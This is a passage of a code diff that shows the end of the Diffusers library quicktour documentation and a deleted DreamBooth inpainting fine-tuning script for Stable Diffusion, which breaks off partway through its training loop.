      - -Save the image by calling `save`: - -```python ->>> image.save("image_of_squirrel_painting.png") -``` - -### Local pipeline - -You can also use the pipeline locally. The only difference is you need to download the weights first: - -```bash -!git lfs install -!git clone https://huggingface.co/runwayml/stable-diffusion-v1-5 -``` - -Then load the saved weights into the pipeline: - -```python ->>> pipeline = DiffusionPipeline.from_pretrained("./stable-diffusion-v1-5", use_safetensors=True) -``` - -Now you can run the pipeline as you would in the section above. - -### Swapping schedulers - -Different schedulers come with different denoising speeds and quality trade-offs. The best way to find out which one works best for you is to try them out! One of the main features of 🧨 Diffusers is to allow you to easily switch between schedulers. For example, to replace the default [`PNDMScheduler`] with the [`EulerDiscreteScheduler`], load it with the [`~diffusers.ConfigMixin.from_config`] method: - -```py ->>> from diffusers import EulerDiscreteScheduler - ->>> pipeline = DiffusionPipeline.from_pretrained("runwayml/stable-diffusion-v1-5", use_safetensors=True) ->>> pipeline.scheduler = EulerDiscreteScheduler.from_config(pipeline.scheduler.config) -``` - -Try generating an image with the new scheduler and see if you notice a difference! - -In the next section, you'll take a closer look at the components - the model and scheduler - that make up the [`DiffusionPipeline`] and learn how to use these components to generate an image of a cat. - -## Models - -Most models take a noisy sample, and at each timestep it predicts the *noise residual* (other models learn to predict the previous sample directly or the velocity or [`v-prediction`](https://github.com/huggingface/diffusers/blob/5e5ce13e2f89ac45a0066cb3f369462a3cf1d9ef/src/diffusers/schedulers/scheduling_ddim.py#L110)), the difference between a less noisy image and the input image. You can mix and match models to create other diffusion systems. - -Models are initiated with the [`~ModelMixin.from_pretrained`] method which also locally caches the model weights so it is faster the next time you load the model. For the quicktour, you'll load the [`UNet2DModel`], a basic unconditional image generation model with a checkpoint trained on cat images: - -```py ->>> from diffusers import UNet2DModel - ->>> repo_id = "google/ddpm-cat-256" ->>> model = UNet2DModel.from_pretrained(repo_id, use_safetensors=True) -``` - -To access the model parameters, call `model.config`: - -```py ->>> model.config -``` - -The model configuration is a 🧊 frozen 🧊 dictionary, which means those parameters can't be changed after the model is created. This is intentional and ensures that the parameters used to define the model architecture at the start remain the same, while other parameters can still be adjusted during inference. - -Some of the most important parameters are: - -* `sample_size`: the height and width dimension of the input sample. -* `in_channels`: the number of input channels of the input sample. -* `down_block_types` and `up_block_types`: the type of down- and upsampling blocks used to create the UNet architecture. -* `block_out_channels`: the number of output channels of the downsampling blocks; also used in reverse order for the number of input channels of the upsampling blocks. -* `layers_per_block`: the number of ResNet blocks present in each UNet block. - -To use the model for inference, create the image shape with random Gaussian noise. 
It should have a `batch` axis because the model can receive multiple random noises, a `channel` axis corresponding to the number of input channels, and a `sample_size` axis for the height and width of the image: - -```py ->>> import torch - ->>> torch.manual_seed(0) - ->>> noisy_sample = torch.randn(1, model.config.in_channels, model.config.sample_size, model.config.sample_size) ->>> noisy_sample.shape -torch.Size([1, 3, 256, 256]) -``` - -For inference, pass the noisy image to the model and a `timestep`. The `timestep` indicates how noisy the input image is, with more noise at the beginning and less at the end. This helps the model determine its position in the diffusion process, whether it is closer to the start or the end. Use the `sample` method to get the model output: - -```py ->>> with torch.no_grad(): -... noisy_residual = model(sample=noisy_sample, timestep=2).sample -``` - -To generate actual examples though, you'll need a scheduler to guide the denoising process. In the next section, you'll learn how to couple a model with a scheduler. - -## Schedulers - -Schedulers manage going from a noisy sample to a less noisy sample given the model output - in this case, it is the `noisy_residual`. - - - -🧨 Diffusers is a toolbox for building diffusion systems. While the [`DiffusionPipeline`] is a convenient way to get started with a pre-built diffusion system, you can also choose your own model and scheduler components separately to build a custom diffusion system. - - - -For the quicktour, you'll instantiate the [`DDPMScheduler`] with it's [`~diffusers.ConfigMixin.from_config`] method: - -```py ->>> from diffusers import DDPMScheduler - ->>> scheduler = DDPMScheduler.from_config(repo_id) ->>> scheduler -DDPMScheduler { - "_class_name": "DDPMScheduler", - "_diffusers_version": "0.13.1", - "beta_end": 0.02, - "beta_schedule": "linear", - "beta_start": 0.0001, - "clip_sample": true, - "clip_sample_range": 1.0, - "num_train_timesteps": 1000, - "prediction_type": "epsilon", - "trained_betas": null, - "variance_type": "fixed_small" -} -``` - - - -💡 Notice how the scheduler is instantiated from a configuration. Unlike a model, a scheduler does not have trainable weights and is parameter-free! - - - -Some of the most important parameters are: - -* `num_train_timesteps`: the length of the denoising process or in other words, the number of timesteps required to process random Gaussian noise into a data sample. -* `beta_schedule`: the type of noise schedule to use for inference and training. -* `beta_start` and `beta_end`: the start and end noise values for the noise schedule. - -To predict a slightly less noisy image, pass the following to the scheduler's [`~diffusers.DDPMScheduler.step`] method: model output, `timestep`, and current `sample`. - -```py ->>> less_noisy_sample = scheduler.step(model_output=noisy_residual, timestep=2, sample=noisy_sample).prev_sample ->>> less_noisy_sample.shape -``` - -The `less_noisy_sample` can be passed to the next `timestep` where it'll get even less noisier! Let's bring it all together now and visualize the entire denoising process. - -First, create a function that postprocesses and displays the denoised image as a `PIL.Image`: - -```py ->>> import PIL.Image ->>> import numpy as np - - ->>> def display_sample(sample, i): -... image_processed = sample.cpu().permute(0, 2, 3, 1) -... image_processed = (image_processed + 1.0) * 127.5 -... image_processed = image_processed.numpy().astype(np.uint8) - -... image_pil = PIL.Image.fromarray(image_processed[0]) -... 
display(f"Image at step {i}") -... display(image_pil) -``` - -To speed up the denoising process, move the input and model to a GPU: - -```py ->>> model.to("cuda") ->>> noisy_sample = noisy_sample.to("cuda") -``` - -Now create a denoising loop that predicts the residual of the less noisy sample, and computes the less noisy sample with the scheduler: - -```py ->>> import tqdm - ->>> sample = noisy_sample - ->>> for i, t in enumerate(tqdm.tqdm(scheduler.timesteps)): -... # 1. predict noise residual -... with torch.no_grad(): -... residual = model(sample, t).sample - -... # 2. compute less noisy image and set x_t -> x_t-1 -... sample = scheduler.step(residual, t, sample).prev_sample - -... # 3. optionally look at image -... if (i + 1) % 50 == 0: -... display_sample(sample, i + 1) -``` - -Sit back and watch as a cat is generated from nothing but noise! 😻 - -
      - -
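    If you want to keep the final result, you can reuse the same post-processing as in `display_sample` to write the last denoised sample to disk (a minimal sketch; the filename is arbitrary):

    ```py
    >>> image_processed = (sample.cpu().permute(0, 2, 3, 1) + 1.0) * 127.5
    >>> image_processed = image_processed.numpy().astype(np.uint8)
    >>> PIL.Image.fromarray(image_processed[0]).save("generated_cat.png")
    ```
    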
      - -## Next steps - -Hopefully you generated some cool images with 🧨 Diffusers in this quicktour! For your next steps, you can: - -* Train or finetune a model to generate your own images in the [training](./tutorials/basic_training) tutorial. -* See example official and community [training or finetuning scripts](https://github.com/huggingface/diffusers/tree/main/examples#-diffusers-examples) for a variety of use cases. -* Learn more about loading, accessing, changing and comparing schedulers in the [Using different Schedulers](./using-diffusers/schedulers) guide. -* Explore prompt engineering, speed and memory optimizations, and tips and tricks for generating higher quality images with the [Stable Diffusion](./stable_diffusion) guide. -* Dive deeper into speeding up 🧨 Diffusers with guides on [optimized PyTorch on a GPU](./optimization/fp16), and inference guides for running [Stable Diffusion on Apple Silicon (M1/M2)](./optimization/mps) and [ONNX Runtime](./optimization/onnx). diff --git a/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/examples/research_projects/dreambooth_inpaint/train_dreambooth_inpaint.py b/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/examples/research_projects/dreambooth_inpaint/train_dreambooth_inpaint.py deleted file mode 100644 index a3eaba014cf6c6a41b46f169868af3edafb521c3..0000000000000000000000000000000000000000 --- a/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/examples/research_projects/dreambooth_inpaint/train_dreambooth_inpaint.py +++ /dev/null @@ -1,812 +0,0 @@ -import argparse -import hashlib -import itertools -import math -import os -import random -from pathlib import Path - -import numpy as np -import torch -import torch.nn.functional as F -import torch.utils.checkpoint -from accelerate import Accelerator -from accelerate.logging import get_logger -from accelerate.utils import ProjectConfiguration, set_seed -from huggingface_hub import create_repo, upload_folder -from PIL import Image, ImageDraw -from torch.utils.data import Dataset -from torchvision import transforms -from tqdm.auto import tqdm -from transformers import CLIPTextModel, CLIPTokenizer - -from diffusers import ( - AutoencoderKL, - DDPMScheduler, - StableDiffusionInpaintPipeline, - StableDiffusionPipeline, - UNet2DConditionModel, -) -from diffusers.optimization import get_scheduler -from diffusers.utils import check_min_version - - -# Will error if the minimal version of diffusers is not installed. Remove at your own risks. 
-check_min_version("0.13.0.dev0") - -logger = get_logger(__name__) - - -def prepare_mask_and_masked_image(image, mask): - image = np.array(image.convert("RGB")) - image = image[None].transpose(0, 3, 1, 2) - image = torch.from_numpy(image).to(dtype=torch.float32) / 127.5 - 1.0 - - mask = np.array(mask.convert("L")) - mask = mask.astype(np.float32) / 255.0 - mask = mask[None, None] - mask[mask < 0.5] = 0 - mask[mask >= 0.5] = 1 - mask = torch.from_numpy(mask) - - masked_image = image * (mask < 0.5) - - return mask, masked_image - - -# generate random masks -def random_mask(im_shape, ratio=1, mask_full_image=False): - mask = Image.new("L", im_shape, 0) - draw = ImageDraw.Draw(mask) - size = (random.randint(0, int(im_shape[0] * ratio)), random.randint(0, int(im_shape[1] * ratio))) - # use this to always mask the whole image - if mask_full_image: - size = (int(im_shape[0] * ratio), int(im_shape[1] * ratio)) - limits = (im_shape[0] - size[0] // 2, im_shape[1] - size[1] // 2) - center = (random.randint(size[0] // 2, limits[0]), random.randint(size[1] // 2, limits[1])) - draw_type = random.randint(0, 1) - if draw_type == 0 or mask_full_image: - draw.rectangle( - (center[0] - size[0] // 2, center[1] - size[1] // 2, center[0] + size[0] // 2, center[1] + size[1] // 2), - fill=255, - ) - else: - draw.ellipse( - (center[0] - size[0] // 2, center[1] - size[1] // 2, center[0] + size[0] // 2, center[1] + size[1] // 2), - fill=255, - ) - - return mask - - -def parse_args(): - parser = argparse.ArgumentParser(description="Simple example of a training script.") - parser.add_argument( - "--pretrained_model_name_or_path", - type=str, - default=None, - required=True, - help="Path to pretrained model or model identifier from huggingface.co/models.", - ) - parser.add_argument( - "--tokenizer_name", - type=str, - default=None, - help="Pretrained tokenizer name or path if not the same as model_name", - ) - parser.add_argument( - "--instance_data_dir", - type=str, - default=None, - required=True, - help="A folder containing the training data of instance images.", - ) - parser.add_argument( - "--class_data_dir", - type=str, - default=None, - required=False, - help="A folder containing the training data of class images.", - ) - parser.add_argument( - "--instance_prompt", - type=str, - default=None, - help="The prompt with identifier specifying the instance", - ) - parser.add_argument( - "--class_prompt", - type=str, - default=None, - help="The prompt to specify images in the same class as provided instance images.", - ) - parser.add_argument( - "--with_prior_preservation", - default=False, - action="store_true", - help="Flag to add prior preservation loss.", - ) - parser.add_argument("--prior_loss_weight", type=float, default=1.0, help="The weight of prior preservation loss.") - parser.add_argument( - "--num_class_images", - type=int, - default=100, - help=( - "Minimal class images for prior preservation loss. If not have enough images, additional images will be" - " sampled with class_prompt." 
- ), - ) - parser.add_argument( - "--output_dir", - type=str, - default="text-inversion-model", - help="The output directory where the model predictions and checkpoints will be written.", - ) - parser.add_argument("--seed", type=int, default=None, help="A seed for reproducible training.") - parser.add_argument( - "--resolution", - type=int, - default=512, - help=( - "The resolution for input images, all the images in the train/validation dataset will be resized to this" - " resolution" - ), - ) - parser.add_argument( - "--center_crop", - default=False, - action="store_true", - help=( - "Whether to center crop the input images to the resolution. If not set, the images will be randomly" - " cropped. The images will be resized to the resolution first before cropping." - ), - ) - parser.add_argument("--train_text_encoder", action="store_true", help="Whether to train the text encoder") - parser.add_argument( - "--train_batch_size", type=int, default=4, help="Batch size (per device) for the training dataloader." - ) - parser.add_argument( - "--sample_batch_size", type=int, default=4, help="Batch size (per device) for sampling images." - ) - parser.add_argument("--num_train_epochs", type=int, default=1) - parser.add_argument( - "--max_train_steps", - type=int, - default=None, - help="Total number of training steps to perform. If provided, overrides num_train_epochs.", - ) - parser.add_argument( - "--gradient_accumulation_steps", - type=int, - default=1, - help="Number of updates steps to accumulate before performing a backward/update pass.", - ) - parser.add_argument( - "--gradient_checkpointing", - action="store_true", - help="Whether or not to use gradient checkpointing to save memory at the expense of slower backward pass.", - ) - parser.add_argument( - "--learning_rate", - type=float, - default=5e-6, - help="Initial learning rate (after the potential warmup period) to use.", - ) - parser.add_argument( - "--scale_lr", - action="store_true", - default=False, - help="Scale the learning rate by the number of GPUs, gradient accumulation steps, and batch size.", - ) - parser.add_argument( - "--lr_scheduler", - type=str, - default="constant", - help=( - 'The scheduler type to use. Choose between ["linear", "cosine", "cosine_with_restarts", "polynomial",' - ' "constant", "constant_with_warmup"]' - ), - ) - parser.add_argument( - "--lr_warmup_steps", type=int, default=500, help="Number of steps for the warmup in the lr scheduler." - ) - parser.add_argument( - "--use_8bit_adam", action="store_true", help="Whether or not to use 8-bit Adam from bitsandbytes." 
- ) - parser.add_argument("--adam_beta1", type=float, default=0.9, help="The beta1 parameter for the Adam optimizer.") - parser.add_argument("--adam_beta2", type=float, default=0.999, help="The beta2 parameter for the Adam optimizer.") - parser.add_argument("--adam_weight_decay", type=float, default=1e-2, help="Weight decay to use.") - parser.add_argument("--adam_epsilon", type=float, default=1e-08, help="Epsilon value for the Adam optimizer") - parser.add_argument("--max_grad_norm", default=1.0, type=float, help="Max gradient norm.") - parser.add_argument("--push_to_hub", action="store_true", help="Whether or not to push the model to the Hub.") - parser.add_argument("--hub_token", type=str, default=None, help="The token to use to push to the Model Hub.") - parser.add_argument( - "--hub_model_id", - type=str, - default=None, - help="The name of the repository to keep in sync with the local `output_dir`.", - ) - parser.add_argument( - "--logging_dir", - type=str, - default="logs", - help=( - "[TensorBoard](https://www.tensorflow.org/tensorboard) log directory. Will default to" - " *output_dir/runs/**CURRENT_DATETIME_HOSTNAME***." - ), - ) - parser.add_argument( - "--mixed_precision", - type=str, - default="no", - choices=["no", "fp16", "bf16"], - help=( - "Whether to use mixed precision. Choose" - "between fp16 and bf16 (bfloat16). Bf16 requires PyTorch >= 1.10." - "and an Nvidia Ampere GPU." - ), - ) - parser.add_argument("--local_rank", type=int, default=-1, help="For distributed training: local_rank") - parser.add_argument( - "--checkpointing_steps", - type=int, - default=500, - help=( - "Save a checkpoint of the training state every X updates. These checkpoints can be used both as final" - " checkpoints in case they are better than the last checkpoint and are suitable for resuming training" - " using `--resume_from_checkpoint`." - ), - ) - parser.add_argument( - "--checkpoints_total_limit", - type=int, - default=None, - help=( - "Max number of checkpoints to store. Passed as `total_limit` to the `Accelerator` `ProjectConfiguration`." - " See Accelerator::save_state https://huggingface.co/docs/accelerate/package_reference/accelerator#accelerate.Accelerator.save_state" - " for more docs" - ), - ) - parser.add_argument( - "--resume_from_checkpoint", - type=str, - default=None, - help=( - "Whether training should be resumed from a previous checkpoint. Use a path saved by" - ' `--checkpointing_steps`, or `"latest"` to automatically select the last available checkpoint.' - ), - ) - - args = parser.parse_args() - env_local_rank = int(os.environ.get("LOCAL_RANK", -1)) - if env_local_rank != -1 and env_local_rank != args.local_rank: - args.local_rank = env_local_rank - - if args.instance_data_dir is None: - raise ValueError("You must specify a train data directory.") - - if args.with_prior_preservation: - if args.class_data_dir is None: - raise ValueError("You must specify a data directory for class images.") - if args.class_prompt is None: - raise ValueError("You must specify prompt for class images.") - - return args - - -class DreamBoothDataset(Dataset): - """ - A dataset to prepare the instance and class images with the prompts for fine-tuning the model. - It pre-processes the images and the tokenizes prompts. 
- """ - - def __init__( - self, - instance_data_root, - instance_prompt, - tokenizer, - class_data_root=None, - class_prompt=None, - size=512, - center_crop=False, - ): - self.size = size - self.center_crop = center_crop - self.tokenizer = tokenizer - - self.instance_data_root = Path(instance_data_root) - if not self.instance_data_root.exists(): - raise ValueError("Instance images root doesn't exists.") - - self.instance_images_path = list(Path(instance_data_root).iterdir()) - self.num_instance_images = len(self.instance_images_path) - self.instance_prompt = instance_prompt - self._length = self.num_instance_images - - if class_data_root is not None: - self.class_data_root = Path(class_data_root) - self.class_data_root.mkdir(parents=True, exist_ok=True) - self.class_images_path = list(self.class_data_root.iterdir()) - self.num_class_images = len(self.class_images_path) - self._length = max(self.num_class_images, self.num_instance_images) - self.class_prompt = class_prompt - else: - self.class_data_root = None - - self.image_transforms_resize_and_crop = transforms.Compose( - [ - transforms.Resize(size, interpolation=transforms.InterpolationMode.BILINEAR), - transforms.CenterCrop(size) if center_crop else transforms.RandomCrop(size), - ] - ) - - self.image_transforms = transforms.Compose( - [ - transforms.ToTensor(), - transforms.Normalize([0.5], [0.5]), - ] - ) - - def __len__(self): - return self._length - - def __getitem__(self, index): - example = {} - instance_image = Image.open(self.instance_images_path[index % self.num_instance_images]) - if not instance_image.mode == "RGB": - instance_image = instance_image.convert("RGB") - instance_image = self.image_transforms_resize_and_crop(instance_image) - - example["PIL_images"] = instance_image - example["instance_images"] = self.image_transforms(instance_image) - - example["instance_prompt_ids"] = self.tokenizer( - self.instance_prompt, - padding="do_not_pad", - truncation=True, - max_length=self.tokenizer.model_max_length, - ).input_ids - - if self.class_data_root: - class_image = Image.open(self.class_images_path[index % self.num_class_images]) - if not class_image.mode == "RGB": - class_image = class_image.convert("RGB") - class_image = self.image_transforms_resize_and_crop(class_image) - example["class_images"] = self.image_transforms(class_image) - example["class_PIL_images"] = class_image - example["class_prompt_ids"] = self.tokenizer( - self.class_prompt, - padding="do_not_pad", - truncation=True, - max_length=self.tokenizer.model_max_length, - ).input_ids - - return example - - -class PromptDataset(Dataset): - "A simple dataset to prepare the prompts to generate class images on multiple GPUs." 
- - def __init__(self, prompt, num_samples): - self.prompt = prompt - self.num_samples = num_samples - - def __len__(self): - return self.num_samples - - def __getitem__(self, index): - example = {} - example["prompt"] = self.prompt - example["index"] = index - return example - - -def main(): - args = parse_args() - logging_dir = Path(args.output_dir, args.logging_dir) - - project_config = ProjectConfiguration( - total_limit=args.checkpoints_total_limit, project_dir=args.output_dir, logging_dir=logging_dir - ) - - accelerator = Accelerator( - gradient_accumulation_steps=args.gradient_accumulation_steps, - mixed_precision=args.mixed_precision, - log_with="tensorboard", - project_config=project_config, - ) - - # Currently, it's not possible to do gradient accumulation when training two models with accelerate.accumulate - # This will be enabled soon in accelerate. For now, we don't allow gradient accumulation when training two models. - # TODO (patil-suraj): Remove this check when gradient accumulation with two models is enabled in accelerate. - if args.train_text_encoder and args.gradient_accumulation_steps > 1 and accelerator.num_processes > 1: - raise ValueError( - "Gradient accumulation is not supported when training the text encoder in distributed training. " - "Please set gradient_accumulation_steps to 1. This feature will be supported in the future." - ) - - if args.seed is not None: - set_seed(args.seed) - - if args.with_prior_preservation: - class_images_dir = Path(args.class_data_dir) - if not class_images_dir.exists(): - class_images_dir.mkdir(parents=True) - cur_class_images = len(list(class_images_dir.iterdir())) - - if cur_class_images < args.num_class_images: - torch_dtype = torch.float16 if accelerator.device.type == "cuda" else torch.float32 - pipeline = StableDiffusionInpaintPipeline.from_pretrained( - args.pretrained_model_name_or_path, torch_dtype=torch_dtype, safety_checker=None - ) - pipeline.set_progress_bar_config(disable=True) - - num_new_images = args.num_class_images - cur_class_images - logger.info(f"Number of class images to sample: {num_new_images}.") - - sample_dataset = PromptDataset(args.class_prompt, num_new_images) - sample_dataloader = torch.utils.data.DataLoader( - sample_dataset, batch_size=args.sample_batch_size, num_workers=1 - ) - - sample_dataloader = accelerator.prepare(sample_dataloader) - pipeline.to(accelerator.device) - transform_to_pil = transforms.ToPILImage() - for example in tqdm( - sample_dataloader, desc="Generating class images", disable=not accelerator.is_local_main_process - ): - bsz = len(example["prompt"]) - fake_images = torch.rand((3, args.resolution, args.resolution)) - transform_to_pil = transforms.ToPILImage() - fake_pil_images = transform_to_pil(fake_images) - - fake_mask = random_mask((args.resolution, args.resolution), ratio=1, mask_full_image=True) - - images = pipeline(prompt=example["prompt"], mask_image=fake_mask, image=fake_pil_images).images - - for i, image in enumerate(images): - hash_image = hashlib.sha1(image.tobytes()).hexdigest() - image_filename = class_images_dir / f"{example['index'][i] + cur_class_images}-{hash_image}.jpg" - image.save(image_filename) - - del pipeline - if torch.cuda.is_available(): - torch.cuda.empty_cache() - - # Handle the repository creation - if accelerator.is_main_process: - if args.output_dir is not None: - os.makedirs(args.output_dir, exist_ok=True) - - if args.push_to_hub: - repo_id = create_repo( - repo_id=args.hub_model_id or Path(args.output_dir).name, exist_ok=True, 
token=args.hub_token - ).repo_id - - # Load the tokenizer - if args.tokenizer_name: - tokenizer = CLIPTokenizer.from_pretrained(args.tokenizer_name) - elif args.pretrained_model_name_or_path: - tokenizer = CLIPTokenizer.from_pretrained(args.pretrained_model_name_or_path, subfolder="tokenizer") - - # Load models and create wrapper for stable diffusion - text_encoder = CLIPTextModel.from_pretrained(args.pretrained_model_name_or_path, subfolder="text_encoder") - vae = AutoencoderKL.from_pretrained(args.pretrained_model_name_or_path, subfolder="vae") - unet = UNet2DConditionModel.from_pretrained(args.pretrained_model_name_or_path, subfolder="unet") - - vae.requires_grad_(False) - if not args.train_text_encoder: - text_encoder.requires_grad_(False) - - if args.gradient_checkpointing: - unet.enable_gradient_checkpointing() - if args.train_text_encoder: - text_encoder.gradient_checkpointing_enable() - - if args.scale_lr: - args.learning_rate = ( - args.learning_rate * args.gradient_accumulation_steps * args.train_batch_size * accelerator.num_processes - ) - - # Use 8-bit Adam for lower memory usage or to fine-tune the model in 16GB GPUs - if args.use_8bit_adam: - try: - import bitsandbytes as bnb - except ImportError: - raise ImportError( - "To use 8-bit Adam, please install the bitsandbytes library: `pip install bitsandbytes`." - ) - - optimizer_class = bnb.optim.AdamW8bit - else: - optimizer_class = torch.optim.AdamW - - params_to_optimize = ( - itertools.chain(unet.parameters(), text_encoder.parameters()) if args.train_text_encoder else unet.parameters() - ) - optimizer = optimizer_class( - params_to_optimize, - lr=args.learning_rate, - betas=(args.adam_beta1, args.adam_beta2), - weight_decay=args.adam_weight_decay, - eps=args.adam_epsilon, - ) - - noise_scheduler = DDPMScheduler.from_pretrained(args.pretrained_model_name_or_path, subfolder="scheduler") - - train_dataset = DreamBoothDataset( - instance_data_root=args.instance_data_dir, - instance_prompt=args.instance_prompt, - class_data_root=args.class_data_dir if args.with_prior_preservation else None, - class_prompt=args.class_prompt, - tokenizer=tokenizer, - size=args.resolution, - center_crop=args.center_crop, - ) - - def collate_fn(examples): - input_ids = [example["instance_prompt_ids"] for example in examples] - pixel_values = [example["instance_images"] for example in examples] - - # Concat class and instance examples for prior preservation. - # We do this to avoid doing two forward passes. 
- if args.with_prior_preservation: - input_ids += [example["class_prompt_ids"] for example in examples] - pixel_values += [example["class_images"] for example in examples] - pior_pil = [example["class_PIL_images"] for example in examples] - - masks = [] - masked_images = [] - for example in examples: - pil_image = example["PIL_images"] - # generate a random mask - mask = random_mask(pil_image.size, 1, False) - # prepare mask and masked image - mask, masked_image = prepare_mask_and_masked_image(pil_image, mask) - - masks.append(mask) - masked_images.append(masked_image) - - if args.with_prior_preservation: - for pil_image in pior_pil: - # generate a random mask - mask = random_mask(pil_image.size, 1, False) - # prepare mask and masked image - mask, masked_image = prepare_mask_and_masked_image(pil_image, mask) - - masks.append(mask) - masked_images.append(masked_image) - - pixel_values = torch.stack(pixel_values) - pixel_values = pixel_values.to(memory_format=torch.contiguous_format).float() - - input_ids = tokenizer.pad({"input_ids": input_ids}, padding=True, return_tensors="pt").input_ids - masks = torch.stack(masks) - masked_images = torch.stack(masked_images) - batch = {"input_ids": input_ids, "pixel_values": pixel_values, "masks": masks, "masked_images": masked_images} - return batch - - train_dataloader = torch.utils.data.DataLoader( - train_dataset, batch_size=args.train_batch_size, shuffle=True, collate_fn=collate_fn - ) - - # Scheduler and math around the number of training steps. - overrode_max_train_steps = False - num_update_steps_per_epoch = math.ceil(len(train_dataloader) / args.gradient_accumulation_steps) - if args.max_train_steps is None: - args.max_train_steps = args.num_train_epochs * num_update_steps_per_epoch - overrode_max_train_steps = True - - lr_scheduler = get_scheduler( - args.lr_scheduler, - optimizer=optimizer, - num_warmup_steps=args.lr_warmup_steps * accelerator.num_processes, - num_training_steps=args.max_train_steps * accelerator.num_processes, - ) - - if args.train_text_encoder: - unet, text_encoder, optimizer, train_dataloader, lr_scheduler = accelerator.prepare( - unet, text_encoder, optimizer, train_dataloader, lr_scheduler - ) - else: - unet, optimizer, train_dataloader, lr_scheduler = accelerator.prepare( - unet, optimizer, train_dataloader, lr_scheduler - ) - accelerator.register_for_checkpointing(lr_scheduler) - - weight_dtype = torch.float32 - if args.mixed_precision == "fp16": - weight_dtype = torch.float16 - elif args.mixed_precision == "bf16": - weight_dtype = torch.bfloat16 - - # Move text_encode and vae to gpu. - # For mixed precision training we cast the text_encoder and vae weights to half-precision - # as these models are only used for inference, keeping weights in full precision is not required. - vae.to(accelerator.device, dtype=weight_dtype) - if not args.train_text_encoder: - text_encoder.to(accelerator.device, dtype=weight_dtype) - - # We need to recalculate our total training steps as the size of the training dataloader may have changed. - num_update_steps_per_epoch = math.ceil(len(train_dataloader) / args.gradient_accumulation_steps) - if overrode_max_train_steps: - args.max_train_steps = args.num_train_epochs * num_update_steps_per_epoch - # Afterwards we recalculate our number of training epochs - args.num_train_epochs = math.ceil(args.max_train_steps / num_update_steps_per_epoch) - - # We need to initialize the trackers we use, and also store our configuration. - # The trackers initializes automatically on the main process. 
- if accelerator.is_main_process: - accelerator.init_trackers("dreambooth", config=vars(args)) - - # Train! - total_batch_size = args.train_batch_size * accelerator.num_processes * args.gradient_accumulation_steps - - logger.info("***** Running training *****") - logger.info(f" Num examples = {len(train_dataset)}") - logger.info(f" Num batches each epoch = {len(train_dataloader)}") - logger.info(f" Num Epochs = {args.num_train_epochs}") - logger.info(f" Instantaneous batch size per device = {args.train_batch_size}") - logger.info(f" Total train batch size (w. parallel, distributed & accumulation) = {total_batch_size}") - logger.info(f" Gradient Accumulation steps = {args.gradient_accumulation_steps}") - logger.info(f" Total optimization steps = {args.max_train_steps}") - global_step = 0 - first_epoch = 0 - - if args.resume_from_checkpoint: - if args.resume_from_checkpoint != "latest": - path = os.path.basename(args.resume_from_checkpoint) - else: - # Get the most recent checkpoint - dirs = os.listdir(args.output_dir) - dirs = [d for d in dirs if d.startswith("checkpoint")] - dirs = sorted(dirs, key=lambda x: int(x.split("-")[1])) - path = dirs[-1] if len(dirs) > 0 else None - - if path is None: - accelerator.print( - f"Checkpoint '{args.resume_from_checkpoint}' does not exist. Starting a new training run." - ) - args.resume_from_checkpoint = None - else: - accelerator.print(f"Resuming from checkpoint {path}") - accelerator.load_state(os.path.join(args.output_dir, path)) - global_step = int(path.split("-")[1]) - - resume_global_step = global_step * args.gradient_accumulation_steps - first_epoch = global_step // num_update_steps_per_epoch - resume_step = resume_global_step % (num_update_steps_per_epoch * args.gradient_accumulation_steps) - - # Only show the progress bar once on each machine. 
- progress_bar = tqdm(range(global_step, args.max_train_steps), disable=not accelerator.is_local_main_process) - progress_bar.set_description("Steps") - - for epoch in range(first_epoch, args.num_train_epochs): - unet.train() - for step, batch in enumerate(train_dataloader): - # Skip steps until we reach the resumed step - if args.resume_from_checkpoint and epoch == first_epoch and step < resume_step: - if step % args.gradient_accumulation_steps == 0: - progress_bar.update(1) - continue - - with accelerator.accumulate(unet): - # Convert images to latent space - - latents = vae.encode(batch["pixel_values"].to(dtype=weight_dtype)).latent_dist.sample() - latents = latents * vae.config.scaling_factor - - # Convert masked images to latent space - masked_latents = vae.encode( - batch["masked_images"].reshape(batch["pixel_values"].shape).to(dtype=weight_dtype) - ).latent_dist.sample() - masked_latents = masked_latents * vae.config.scaling_factor - - masks = batch["masks"] - # resize the mask to latents shape as we concatenate the mask to the latents - mask = torch.stack( - [ - torch.nn.functional.interpolate(mask, size=(args.resolution // 8, args.resolution // 8)) - for mask in masks - ] - ) - mask = mask.reshape(-1, 1, args.resolution // 8, args.resolution // 8) - - # Sample noise that we'll add to the latents - noise = torch.randn_like(latents) - bsz = latents.shape[0] - # Sample a random timestep for each image - timesteps = torch.randint(0, noise_scheduler.config.num_train_timesteps, (bsz,), device=latents.device) - timesteps = timesteps.long() - - # Add noise to the latents according to the noise magnitude at each timestep - # (this is the forward diffusion process) - noisy_latents = noise_scheduler.add_noise(latents, noise, timesteps) - - # concatenate the noised latents with the mask and the masked latents - latent_model_input = torch.cat([noisy_latents, mask, masked_latents], dim=1) - - # Get the text embedding for conditioning - encoder_hidden_states = text_encoder(batch["input_ids"])[0] - - # Predict the noise residual - noise_pred = unet(latent_model_input, timesteps, encoder_hidden_states).sample - - # Get the target for loss depending on the prediction type - if noise_scheduler.config.prediction_type == "epsilon": - target = noise - elif noise_scheduler.config.prediction_type == "v_prediction": - target = noise_scheduler.get_velocity(latents, noise, timesteps) - else: - raise ValueError(f"Unknown prediction type {noise_scheduler.config.prediction_type}") - - if args.with_prior_preservation: - # Chunk the noise and noise_pred into two parts and compute the loss on each part separately. - noise_pred, noise_pred_prior = torch.chunk(noise_pred, 2, dim=0) - target, target_prior = torch.chunk(target, 2, dim=0) - - # Compute instance loss - loss = F.mse_loss(noise_pred.float(), target.float(), reduction="none").mean([1, 2, 3]).mean() - - # Compute prior loss - prior_loss = F.mse_loss(noise_pred_prior.float(), target_prior.float(), reduction="mean") - - # Add the prior loss to the instance loss. 
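# i.e. the line below computes
#   loss = mse(instance_pred, instance_target) + prior_loss_weight * mse(prior_pred, prior_target)
# with both terms reduced to scalar means.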
